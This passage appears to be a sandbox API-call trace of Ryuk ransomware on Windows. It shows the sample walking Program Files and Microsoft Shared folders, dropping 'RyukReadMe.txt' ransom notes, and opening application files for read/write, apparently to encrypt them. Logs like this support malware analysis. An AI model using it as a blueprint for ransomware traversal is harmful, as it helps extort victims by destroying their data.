(lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.515] GetLastError () returned 0x5 [0131.515] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.515] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0131.515] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0131.515] SetLastError (dwErrCode=0x0) [0131.515] CreateFileW (lpFileName="C:\\PerfLogs\\RyukReadMe.txt" (normalized: "c:\\perflogs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.515] GetLastError () returned 0x5 [0131.515] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.515] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.515] FindNextFileW (in: hFindFile=0x3bcd90, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0131.515] SetLastError (dwErrCode=0x0) [0131.515] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.516] GetLastError () returned 0x5 [0131.516] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0131.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3c7120 [0131.516] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x3c7120, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0131.516] SetLastError (dwErrCode=0x0) [0131.516] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.516] GetLastError () returned 0x5 [0131.516] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0131.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3c3ef0 [0131.516] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.516] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.516] SetLastError (dwErrCode=0x0) [0131.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.516] GetLastError () returned 0x5 [0131.516] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0131.516] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.516] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0131.517] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.517] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.517] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0131.517] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0131.517] SetLastError (dwErrCode=0x0) [0131.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\designer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.517] GetLastError () returned 0x5 [0131.517] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0131.517] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.517] FindNextFileW (in: hFindFile=0x3c3ef0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0131.517] SetLastError (dwErrCode=0x0) [0131.517] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.517] GetLastError () returned 0x5 [0131.517] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0131.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.518] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3bd420 [0131.518] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.518] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.518] SetLastError (dwErrCode=0x0) [0131.518] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.518] GetLastError () returned 0x5 [0131.518] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.518] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.518] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.519] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.519] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.520] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.520] SetLastError (dwErrCode=0x0) [0131.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.520] GetLastError () returned 0x5 [0131.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.520] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.520] SetLastError (dwErrCode=0x0) [0131.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.520] GetLastError () returned 0x5 [0131.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.520] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.520] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.520] SetLastError (dwErrCode=0x0) [0131.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.520] GetLastError () returned 0x5 [0131.520] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.520] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.521] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.521] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.521] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.521] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.521] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.521] SetLastError (dwErrCode=0x0) [0131.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.522] GetLastError () returned 0x5 [0131.522] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.522] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.522] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.522] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.522] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", dwFileAttributes=0x80) returned 0 [0131.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.523] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.523] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.523] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.523] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.523] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.523] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.523] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", dwFileAttributes=0x80) returned 0 [0131.526] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.526] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.526] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.526] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", dwFileAttributes=0x80) returned 0 [0131.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.527] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.527] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.527] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.527] SetLastError (dwErrCode=0x0) [0131.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.527] GetLastError () returned 0x5 [0131.527] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.527] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.527] SetLastError (dwErrCode=0x0) [0131.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.527] GetLastError () returned 0x5 [0131.527] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.527] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.527] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.528] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.528] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.528] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.528] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.528] SetLastError (dwErrCode=0x0) [0131.528] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.530] GetLastError () returned 0x5 [0131.530] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.530] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.530] SetLastError (dwErrCode=0x0) [0131.530] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.530] GetLastError () returned 0x5 [0131.530] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.530] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.530] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.531] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.531] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.531] SetLastError (dwErrCode=0x0) [0131.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.531] GetLastError () returned 0x5 [0131.532] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.532] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.532] SetLastError (dwErrCode=0x0) [0131.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.532] GetLastError () returned 0x5 [0131.532] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.532] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.532] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.534] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.534] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.534] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", dwFileAttributes=0x80) returned 0 [0131.536] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.536] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.536] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.536] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.536] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", dwFileAttributes=0x80) returned 0 [0131.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.537] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.537] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.537] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.537] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.538] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", dwFileAttributes=0x80) returned 0 [0131.538] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.538] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.538] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT", dwFileAttributes=0x80) returned 0 [0131.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.539] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.539] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT", dwFileAttributes=0x80) returned 0 [0131.540] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft 